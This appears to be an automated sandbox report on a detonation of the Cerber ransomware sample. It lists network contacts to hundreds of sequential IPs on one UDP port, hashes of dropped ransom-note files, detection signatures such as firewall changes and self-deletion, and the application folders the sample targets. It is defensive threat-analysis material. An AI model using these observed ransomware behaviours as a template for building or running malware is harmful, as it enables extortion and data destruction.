FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.204.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 63.242.123.52.in-addr.arpa udp

Files

memory/8-0-0x0000000000640000-0x0000000000671000-memory.dmp

memory/8-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-3-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-7-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-8-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-12-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___PP0MW4ML_.txt

MD5 7f51304cadcf3569710d715abffb6c66
SHA1 90d6a81c1c8815300ad8033675451c2d81ed6122
SHA256 78974b71ac312f5dd8305d10f826de9d13e2b31183a6cdfe2fadb26828cd990f
SHA512 3ced58767d702ecf0f351e0e99787314c06516ea7d5404a2001d98fc5d7f7b55304ddd372b62af0660f89285a2154d04ccc1c7ad891dc0adc5c5e215fa1c165c

C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___DAVP5KX_.hta

MD5 5629fc7751dcdf21f245a775d12697ab
SHA1 f2c6e68b3c9339c1f0263d610df1b61431bcbac8
SHA256 b35e5a86466a238e4b15671fc0fcd0fca0b6314c2ee3c782c40e72bc2ca6ba7d
SHA512 f5ed260dc3e20656c69902bf0ed05d77e6346d47e79912637c429e393083cf894fccac5f641da8bdfe4bd050d75c8c03442a1a32f6c9b31f28bdfa096ea599de

memory/8-353-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-350-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-360-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-379-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-380-0x0000000000440000-0x0000000000451000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:02

Platform

win7-20240220-en

Max time kernel

136s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

Signatures

Cerber

ransomware cerber

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Contacts a large (1095) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp2EBE.bmp" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\documents C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\desktop C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
